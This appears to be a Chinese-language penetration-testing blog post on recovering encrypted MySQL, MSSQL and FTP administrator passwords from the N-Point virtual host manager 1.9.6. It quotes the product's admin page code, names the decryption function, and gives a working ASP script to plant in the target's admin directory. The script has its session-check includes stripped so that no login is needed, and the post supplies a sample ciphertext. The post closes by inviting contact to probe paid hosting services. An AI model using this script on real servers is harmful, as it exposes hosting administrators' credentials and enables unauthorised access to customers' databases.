N点虚拟主机1.9.6版密文解密

N点虚拟主机1.9.6版密文解密

     0x1:起因

    最近加入的学员的 发来n点密文怎么解密的问题？我记得诸如这个版本的密文解密的问题 无论在90sec t00ls 暗月信息安全论坛，关于这个的问题还真多。之前网上放出的是1.9.3版的脚本 针对于 1.9.6很多人说不能用，相同的问题 在不同的论坛 也看到很多，暗月技术渗透团队，作为一个技术性的团队 在此分享一下解密方法。

    0x2:测试环境

   VMware9.0  wind2003 zkeysphp N点虚拟主机管理系统1.9.6个人版 本次测试环境。

   搭建好 配置好 如图：

    0x3:分析过程

   一般找有数据库连接的地方 我们在开发的时候 一般的过程都是 在数据库连接的地方 将其加密

   例如php  一般是这样加密的

md5(request['moon']) 

然后 传进sql语句里面。这样找就简单多了。因这里环境只是装了一个mysql 所以找mysql相关的页面 搜索一下mysql相关页面 找到admin/mysql.asp 现在我们进来看看

<!--#include file="sessioncolck.asp" --> <!--#include file="pagesession/CS4.asp" --> <!--#include file="../inc/conn.asp" --> <!--#include file="../inc/char.asp" --> <!--#include file="../inc/function.asp" --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <title>Powered By npoint</title> <link href="../css/style.css" rel="stylesheet" type="text/css" /> <script src="../js/ajax_x.js" type="text/javascript"></script> <script src="../js/alt.js" type="text/javascript"></script> </head> <body><% set iishost=server.createobject("npoint.host") '加载组件 rs.open "Select * from hostcs",conn,1,1 mysqlip=rs("mysqlip") 'MYSQL/IP地址 mysqlport=rs("mysqlport") 'MYSQL/端口 mysqlroot=rs("mysqlroot") 'MYSQL/管理员账号 mysqlpass=iishost.Eduserpassword(rs("mysqlpass"),0) 'MYSQL/管理员密码

首先加载组件 查询字段内容 赋值给各个变量

iishost.Eduserpassword(变量,0)

这个是关键的加密解密函数 1表示加密 0表示解密

如图所示：

msql mysql ftp加密解密全都是这个函数。

     0x4：编写exp

    n点系统是加密是随机的 所以单独写解密脚本 不靠谱，要在原来的n点目录admin下面新建一个文件（这里是hash.asp），记得不能在本地 因为加密字符不一样的，复制刚才的代码。

<!--#include file="sessioncolck.asp" --> <!--#include file="pagesession/CS4.asp" --> <!--#include file="../inc/conn.asp" --> <!--#include file="../inc/char.asp" --> <!--#include file="../inc/function.asp" --> <% set iishost=server.createobject("npoint.host") pass=iishost.Eduserpassword("密文字符串可以是mysql mmsql ftp",0) response.write pass  %>

<!--#include file="sessioncolck.asp" --> <!--#include file="pagesession/CS4.asp" -->

这两段可以不要 因为要后台session验证 没账号密码的你还要伪造直接去掉 简化后得此

<!--#include file="../inc/conn.asp" --> <!--#include file="../inc/char.asp" --> <!--#include file="../inc/function.asp" --> <% set iishost=server.createobject("npoint.host") pass=iishost.Eduserpassword("密文字符串",0) response.write pass  %>

    0x5：实践证明

数据库mysql 加密如图：

脚本如下：

<!--#include file="../inc/conn.asp" --> <!--#include file="../inc/char.asp" --> <!--#include file="../inc/function.asp" --> <% set iishost=server.createobject("npoint.host") pass=iishost.Eduserpassword("WMBXJVGUIM7XVQ53FXAFCLO0B@GDOIOAC@OMKJGLE@OCBFMEH@BGNKJKAH@JGNA@ODMMOI@JJHHACLBFDFIJCGCEGODNANAKGOBDIHHNCLFJBKJFCCI@KKHMIKNICCDIDMNGKBNINILBLOPC@MCDCEBCMHCGEDKEMNOEFMOFOLCOAAFAJHDOIELKFGL@GIAD@LCEMBGGDCJFGDFCOJ@NAK@B",0) response.write pass  %>

解密如图：

     0x5总结

     本次案例是一个典型的解密过程，希望基友们都可以学习到一些对自已有用的方法，有什么问题可以在跟帖。例如想研究收费虚拟主机的朋友也可以联系本人 只要有环境 就能找到一些对大家有用的东西。本次案例希望转载的朋友 带上小编的博客链接，谢谢!